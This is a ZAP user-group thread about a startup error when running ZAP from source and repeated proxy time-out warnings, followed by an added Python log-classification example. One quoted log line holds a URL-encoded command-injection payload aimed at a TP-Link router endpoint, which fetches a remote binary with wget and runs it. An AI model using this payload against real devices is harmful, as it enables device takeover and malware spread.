Issue starting ZAP on Debian 11

Hari Manne

Apr 21, 2024, 2:29:35 PM
to ZAP User Group
Hi

I'm starting ZAP using the command below.

./gradlew run  --args="-daemon -host <hostname> -config api.addrs.addr.name=.* -config api.addrs.addr.regex=true -config api.key=<key>"

I'm getting an error while starting, but I can see that ZAP is accessible.

++++++++++++++++
13895 [ZAP-daemon] INFO  org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - Loaded passive scan rule: Use of SAML
13903 [ZAP-daemon] ERROR org.parosproxy.paros.extension.ExtensionLoader - Failed to initialise extension org.zaproxy.zap.extension.pscan.ExtensionPassiveScan, cause: IllegalArgumentException: Parameter addOnClassLoader must not be null.
java.lang.IllegalArgumentException: Parameter addOnClassLoader must not be null.
        at org.zaproxy.zap.extension.pscan.ExtensionPassiveScan.validateNotNull(ExtensionPassiveScan.java:831) ~[main/:?]
        at org.zaproxy.zap.extension.pscan.ExtensionPassiveScan.loadDeclaredClasses(ExtensionPassiveScan.java:775) ~[main/:?]
        at org.zaproxy.zap.extension.pscan.ExtensionPassiveScan.lambda$getPassiveScanRules$1(ExtensionPassiveScan.java:741) ~[main/:?]
        at java.util.HashMap.computeIfAbsent(HashMap.java:1134) ~[?:?]
        at org.zaproxy.zap.extension.pscan.ExtensionPassiveScan.getPassiveScanRules(ExtensionPassiveScan.java:738) ~[main/:?]
        at org.zaproxy.zap.extension.pscan.ExtensionPassiveScan.loadScanRules(ExtensionPassiveScan.java:750) ~[main/:?]
        at java.util.ArrayList.forEach(ArrayList.java:1541) ~[?:?]
        at org.zaproxy.zap.extension.pscan.ExtensionPassiveScan.postInit(ExtensionPassiveScan.java:146) ~[main/:?]
        at org.parosproxy.paros.extension.ExtensionLoader.hookAllExtension(ExtensionLoader.java:1001) [main/:?]
        at org.parosproxy.paros.extension.ExtensionLoader.startLifeCycle(ExtensionLoader.java:836) [main/:?]
        at org.parosproxy.paros.control.AbstractControl.loadExtension(AbstractControl.java:58) [main/:?]
        at org.parosproxy.paros.control.Control.init(Control.java:156) [main/:?]
        at org.parosproxy.paros.control.Control.initSingletonWithoutView(Control.java:394) [main/:?]
        at org.zaproxy.zap.HeadlessBootstrap.initControl(HeadlessBootstrap.java:59) [main/:?]
        at org.zaproxy.zap.DaemonBootstrap$1.run(DaemonBootstrap.java:75) [main/:?]
        at java.lang.Thread.run(Thread.java:829) [?:?]
14068 [ZAP-daemon] ERROR org.zaproxy.addon.client.ExtensionClientIntegration - Failed to get or create Firefox profile zap-client-profile
14976 [ZAP-daemon] INFO  org.flywaydb.core.internal.license.VersionPrinter - Flyway Community Edition 9.20.0 by Redgate
14977 [ZAP-daemon] INFO  org.flywaydb.core.internal.license.VersionPrinter - See release notes here: https://rd.gt/416ObMi
14977 [ZAP-daemon] INFO  org.flywaydb.core.internal.license.VersionPrinter - 
14998 [ZAP-daemon] INFO  org.flywaydb.core.internal.database.base.BaseDatabaseType - Database: jdbc:hsqldb:file:/root/.ZAP_D/db/permanent (HSQL Database Engine 2.7)
15008 [ZAP-daemon] WARN  org.flywaydb.core.internal.database.base.Database - Flyway upgrade recommended: HSQLDB 2.7 is newer than this version of Flyway and support has not been tested. The latest supported version of HSQLDB is 2.6.
15047 [ZAP-daemon] INFO  org.flywaydb.core.internal.command.DbValidate - Successfully validated 1 migration (execution time 00:00.026s)
15067 [ZAP-daemon] INFO  org.flywaydb.core.internal.command.DbMigrate - Current version of schema "PUBLIC": 1
15073 [ZAP-daemon] INFO  org.flywaydb.core.internal.command.DbMigrate - Schema "PUBLIC" is up to date. No migration necessary.
15089 [ZAP-daemon] INFO  org.zaproxy.addon.oast.services.callback.CallbackService - Started callback service on 0.0.0.0:36217
15313 [ZAP-daemon] INFO  org.zaproxy.addon.network.ExtensionNetwork - ZAP is now listening on <hostname>:8080
----------------------

When I try to scan, I get the message below continuously, even though the scan failed.


++++++++++++

324557 [ZAP-IO-Server-1-275] WARN  org.zaproxy.addon.network.internal.server.http.handlers.HttpSenderHandler - Failed to read http://<host public ip>:8080/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F<ip>%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) within 20 seconds, check to see if the site is available and if so consider adjusting ZAP's read time out in the Connection options panel.

Can you help me resolve the above issues?

thc...@gmail.com

Apr 22, 2024, 2:49:50 AM
to zaprox...@googlegroups.com
Hi,

What's your setup? Which commit in core and which add-ons are installed?


For the warning, is <host public ip> ZAP?

Best regards.

Hari Manne

Apr 23, 2024, 2:52:47 AM
to ZAP User Group
Hi 

I cloned the zap-extensions and zaproxy repos and ran the commands below.
++++++++++++
cd /zap/zap-extensions
./gradlew tasks
./gradlew copyMandatoryAddOns
./gradlew copyZapAddOn
./gradlew addOns:pscanrules:copyZapAddOn
cd /zap/zaproxy
./gradlew tasks
./gradlew copyWeeklyAddOns
./gradlew run  --args="-daemon -host <internalhostname> -config api.addrs.addr.name=.* -config api.addrs.addr.regex=true -config api.key=secret"
+++++++++++


For the warning, is <host public ip> ZAP?

> Yes, it's the public IP of ZAP.

thc...@gmail.com

Apr 29, 2024, 4:04:22 AM
to zaprox...@googlegroups.com
The first issue should be fixed now.


You should define the public IP address as an alias so ZAP knows that
it's itself and thus does not forward those requests.
https://www.zaproxy.org/docs/desktop/addons/network/options/localservers/#aliases

But that request does not seem like something that would be
requested of ZAP; did you mean to proxy that instead of using ZAP's
public address?

Best regards.
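
Added example (not part of the original thread and not ZAP project code): a Python check over a ZAP log that counts read time-outs for requests addressed to one of the machine's own addresses on ZAP's listening port, which are the hosts the reply above suggests defining as aliases. The two message formats are taken from the log excerpts in this thread; the sample log lines, host names and the 203.0.113.10 address are constructed, and `own_addresses` is an operator-supplied assumption.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Message formats as they appear in the log excerpts quoted in this thread.
LISTEN_RE = re.compile(r"ExtensionNetwork - ZAP is now listening on (\S+):(\d+)")
TIMEOUT_RE = re.compile(r"HttpSenderHandler - Failed to read (\S+) within \d+ seconds")

# Constructed sample log (hosts and addresses are placeholders, not from the thread).
SAMPLE_LOG = """\
15313 [ZAP-daemon] INFO  org.zaproxy.addon.network.ExtensionNetwork - ZAP is now listening on zap-internal:8080
324557 [ZAP-IO-Server-1-275] WARN  org.zaproxy.addon.network.internal.server.http.handlers.HttpSenderHandler - Failed to read http://203.0.113.10:8080/status?check=1 within 20 seconds, check to see if the site is available
324990 [ZAP-IO-Server-1-276] WARN  org.zaproxy.addon.network.internal.server.http.handlers.HttpSenderHandler - Failed to read http://203.0.113.10:8080/other within 20 seconds, check to see if the site is available
330001 [ZAP-IO-Server-1-277] WARN  org.zaproxy.addon.network.internal.server.http.handlers.HttpSenderHandler - Failed to read http://app.example.test/login within 20 seconds, check to see if the site is available
"""


def classify_timeouts(log_text, own_addresses):
    """Split read time-outs into requests aimed at this machine and real upstream ones.

    own_addresses: names/IPs that reach this machine (operator-supplied assumption).
    """
    listen = LISTEN_RE.search(log_text)
    if not listen:
        raise ValueError("no 'ZAP is now listening on' line found")
    listen_host, listen_port = listen.group(1).lower(), int(listen.group(2))
    own = {a.lower() for a in own_addresses}

    alias_candidates, upstream = Counter(), Counter()
    for raw_url in TIMEOUT_RE.findall(log_text):
        try:
            parts = urlsplit(raw_url)
            port = parts.port or {"http": 80, "https": 443}.get(parts.scheme)
        except ValueError:  # malformed authority or port in the logged URL
            continue
        host = (parts.hostname or "").lower()
        # Same port as ZAP and a host that is this machine, but not the name ZAP
        # listens as: ZAP tried to forward a request that was meant for itself.
        if port == listen_port and host in own and host != listen_host:
            alias_candidates[host] += 1
        else:
            upstream[host] += 1
    return alias_candidates, upstream


if __name__ == "__main__":
    candidates, upstream = classify_timeouts(SAMPLE_LOG, {"203.0.113.10"})
    print("define as aliases:", dict(candidates))
    print("upstream time-outs:", dict(upstream))
```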